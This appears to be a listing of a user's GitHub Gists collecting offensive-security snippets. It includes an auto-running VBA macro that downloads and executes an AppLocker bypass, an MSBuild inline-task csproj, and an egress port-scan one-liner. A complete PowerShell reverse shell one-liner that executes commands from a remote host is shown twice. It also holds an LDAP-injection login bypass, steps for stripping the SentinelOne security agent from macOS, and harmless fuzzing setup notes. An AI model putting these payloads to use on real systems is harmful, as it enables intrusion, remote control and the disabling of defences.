nani1337 / macro_download_and_execute_msbuild_csproj_powershell.vba

Created December 21, 2022 00:34 — forked from egre55/macro_download_and_execute_msbuild_csproj_powershell.vba

macro - download and execute applocker bypass (msbuild / csproj / powershell)

	' based on
	' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
	'
	' powashell.csproj by @SubTee
	' https://gist.github.com/egre55/7a6b6018c9c5ae88c63bdb23879df4d0

	Sub Document_Open()
	Dim WinHttpReq As Object
	Dim oStream As Object
	Dim myURL As String

nani1337 / powashell.csproj

Created December 21, 2022 00:34 — forked from egre55/powashell.csproj

powashell.csproj by Casey Smith @subTee

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask
	TaskName="ClassExample"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >

nani1337 / egress_check.ps1

Created December 21, 2022 00:34 — forked from egre55/egress_check.ps1

egress check one-liner

	# Ugly PowerShell egress check one-liner (works in Constrained Language Mode)
	# NMap top 50 ports. Checking > 50 may cause Memory DoS

	foreach ($i in 50,21,22,23,25,26,53,80,81,110,111,113,135,139,143,179,199,443,445,465,514,515,548,554,587,646,993,995,1025,1026,1027,1433,1720,1723,2000,2001,3306,3389,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154){Start-Job -ScriptBlock {param($i) & Test-NetConnection -ComputerName 10.10.10.10 -Port $i} -ArgumentList $i} Get-Job \| Wait-Job \| Get-Job \| Receive-Job

nani1337 / locations_writable_by_non-admin_users_in_windows.txt

Created December 21, 2022 00:34 — forked from egre55/locations_writable_by_non-admin_users_in_windows.txt

locations_writable_by_non-admin_users_in_windows

	## locations writable by non-admin users in Windows (Windows 10)

	# default folders

	C:\$Recycle.Bin\<USER SID> (whoami /user)
	C:\Users\All Users (links to C:\ProgramData)
	C:\PerfLogs
	C:\ProgramData
	C:\Windows\Tasks
	C:\Windows\tracing

nani1337 / powershell_reverse_shell.ps1

Created December 21, 2022 00:31 — forked from egre55/powershell_reverse_shell.ps1

powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok

	# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

	$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" \| Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

nani1337 / powershell_reverse_shell.ps1

Created December 21, 2022 00:31 — forked from egre55/powershell_reverse_shell.ps1

powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok

	# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

	$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" \| Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

nani1337 / LDAP injection

Created June 27, 2022 07:34

	§ curl "william:password@localhost:9080/login"
	Login failed

	By exploiting the LDAP injection, we bypass the LDAP filter constraint and are successfully signed in:

	$ curl "william))(&(abc=:password@localhost:9080/login"
	WSPrincipal:uid=william,cn=users,dc=my-company,dc=com

nani1337 / README.md

Created February 24, 2022 10:58 — forked from nwade/README.md

Remove SentinelOne Agent - macOS High Sierra/Mojave

Warning - use at your own risk

Remove SentinelOne agent from Mac

Boot into Recovery Mode by holding Cmd+R during reboot
Open Terminal from top menubar
Run /Applications/Utilities/Disk\ Utility.app/Contents/MacOS/Disk\ Utility to open Disk Utility
If your startup disk is encrypted, use Disk Utility to mount it
In Terminal, run chroot /Volumes/Macintosh\ HD
Execute the deletion commands or script

nani1337 / winafl-setup.md

Created November 4, 2021 04:56 — forked from insi2304/winafl-setup.md

How to setup winafl on Windows 10

Clone winafl

git clone https://github.com/googleprojectzero/winafl.git

If needing Intel processor support

git submodule update --init --recursive

Download Visual Studio 15 2017 and install "Desktop development with C++"

nani1337 / cmake_build.sh

Created November 4, 2021 04:36 — forked from insi2304/cmake_build.sh

cmake AFL build

#!/bin/bash

cmake -DCMAKE_C_COMPILER=afl-clang-fast -DCMAKE_CXX_COMPILER=afl-clang-fast++ -DCMAKE_CXX_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all -g" -DCMAKE_C_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all -g" -DCMAKE_EXE_LINKER_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all" DCMAKE_INSTALL_PREFIX=/home/fuzz/fuzzing/xpdf-4.03/install/ -DCMAKE_MODULE_LINKER_FLAGS="-fno-rtti -fsanitize=address,undefined -fno-sanitize-recover=all" -DCMAKE_BUILD_TYPE=Debug,ASAN,UBSAN -DWITH_SSE2=ON -DMONOLITHIC_BUILD=ON -DBUILD_SHARED_LIBS=OFF .